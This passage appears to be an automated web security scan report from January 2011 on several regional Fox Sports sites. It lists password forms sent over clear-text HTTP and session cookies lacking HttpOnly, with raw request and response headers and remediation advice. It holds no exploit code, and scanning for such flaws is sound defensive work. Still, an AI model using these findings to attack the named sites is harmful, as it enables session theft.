<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.foxsportscarolinas.com/
The form contains the following password field:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportscarolinas.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Pragma: no-cache Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 12 Jan 2011 16:30:48 GMT Date: Wed, 12 Jan 2011 16:30:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: PHPSESSID=3271d39cc8617c11fa58992b3826f5a0; path=/ Content-Length: 67154
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.foxsportsdetroit.com/
The form contains the following password field:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:23:03 GMT Server: Apache Set-Cookie: PHPSESSID=f98e5e7a4e031dcbf5dbf7acff41bb35; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 74214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
GET /01/11/11/Hoke-who/landing.html HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:26:41 GMT Server: Apache Set-Cookie: PHPSESSID=05e45841134be0f8e849c03d0475b24f; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 50741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:47 GMT Server: Apache Set-Cookie: PHPSESSID=f7fa2ad3beef39ba25d4799d4abff0a5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 50741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.foxsportsflorida.com/
The form contains the following password field:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportsflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:50 GMT Server: Apache Set-Cookie: PHPSESSID=aac2f23f8215a809567600eb37ffca51; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 76322
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html HTTP/1.1 Host: www.foxsportsflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:50 GMT Server: Apache Set-Cookie: PHPSESSID=552dd2fb6e357039c005c0bb8665d203; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 47665
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.foxsportshouston.com/
The form contains the following password field:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportshouston.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:56 GMT Server: Apache Set-Cookie: PHPSESSID=d3f0a37aad79eca82e7871d6bfdcad10; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 69986
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.foxsportskansascity.com/
The form contains the following password field:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportskansascity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:56 GMT Server: Apache Set-Cookie: PHPSESSID=9d01435dbe7e17e2b982f0304dd0dd69; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 67136
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.foxsportsmidwest.com/
The form contains the following password field:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportsmidwest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:56 GMT Server: Apache Set-Cookie: PHPSESSID=be186108f22ff29fc5206079350ee590; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 76839
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.foxsportsohio.com/
The form contains the following password field:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportsohio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:02 GMT Server: Apache Set-Cookie: PHPSESSID=090a220f00fee006a09844523813c3f9; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 78763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.foxsportssouth.com/
The form contains the following password field:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportssouth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:08 GMT Server: Apache Set-Cookie: PHPSESSID=8fc384966e11984cdc4ff0ba62e6bda3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 87289
GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html?blockID=389214&feedID=4354 HTTP/1.1 Host: www.foxsportssouth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:23:29 GMT Server: Apache Set-Cookie: PHPSESSID=f9238600833496253f5dffcf1949b4ff; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 83915
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.foxsportssouthwest.com/
The form contains the following password field:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportssouthwest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:09 GMT Server: Apache Set-Cookie: PHPSESSID=7d9d4d196f8c57526962134428908ef5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 74557
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.foxsportstennessee.com/
The form contains the following password field:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportstennessee.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:11 GMT Server: Apache Set-Cookie: PHPSESSID=452c8dd2904462f9015b783662923a87; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 68716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
GET /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html HTTP/1.1 Host: www.foxsportswest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:11 GMT Server: Apache Set-Cookie: PHPSESSID=52ba63048e530107d21cb80ac654b510; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 58751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.foxsportswisconsin.com/
The form contains the following password field:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportswisconsin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:16 GMT Server: Apache Set-Cookie: PHPSESSID=b346a6944b6aa67934f8452ef87105ed; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 74886
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:38 GMT Server: Apache Set-Cookie: PHPSESSID=af9575f12421c13e00e39bf3dd199ca5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 84050
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:38 GMT Server: Apache Set-Cookie: PHPSESSID=dce594637b946858ac8562e11cd29bfc; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 51085
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.foxsportscarolinas.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Pragma: no-cache Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 12 Jan 2011 16:30:48 GMT Date: Wed, 12 Jan 2011 16:30:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: PHPSESSID=3271d39cc8617c11fa58992b3826f5a0; path=/ Content-Length: 67154
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:23:03 GMT Server: Apache Set-Cookie: PHPSESSID=f98e5e7a4e031dcbf5dbf7acff41bb35; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 74214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /01/11/11/Hoke-who/landing.html HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:26:41 GMT Server: Apache Set-Cookie: PHPSESSID=05e45841134be0f8e849c03d0475b24f; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 50741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:47 GMT Server: Apache Set-Cookie: PHPSESSID=f7fa2ad3beef39ba25d4799d4abff0a5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 50741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.foxsportsflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:50 GMT Server: Apache Set-Cookie: PHPSESSID=aac2f23f8215a809567600eb37ffca51; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 76322
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html HTTP/1.1 Host: www.foxsportsflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:50 GMT Server: Apache Set-Cookie: PHPSESSID=552dd2fb6e357039c005c0bb8665d203; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 47665
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.foxsportshouston.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:56 GMT Server: Apache Set-Cookie: PHPSESSID=d3f0a37aad79eca82e7871d6bfdcad10; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 69986
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.foxsportskansascity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:56 GMT Server: Apache Set-Cookie: PHPSESSID=9d01435dbe7e17e2b982f0304dd0dd69; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 67136
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.foxsportsmidwest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:56 GMT Server: Apache Set-Cookie: PHPSESSID=be186108f22ff29fc5206079350ee590; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 76839
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.foxsportsohio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:02 GMT Server: Apache Set-Cookie: PHPSESSID=090a220f00fee006a09844523813c3f9; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 78763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.foxsportssouth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:08 GMT Server: Apache Set-Cookie: PHPSESSID=8fc384966e11984cdc4ff0ba62e6bda3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 87289
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html xmlns="http ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html?blockID=389214&feedID=4354 HTTP/1.1 Host: www.foxsportssouth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:23:29 GMT Server: Apache Set-Cookie: PHPSESSID=f9238600833496253f5dffcf1949b4ff; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 83915
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html xmlns="http ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.foxsportssouthwest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:09 GMT Server: Apache Set-Cookie: PHPSESSID=7d9d4d196f8c57526962134428908ef5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 74557
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.foxsportstennessee.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
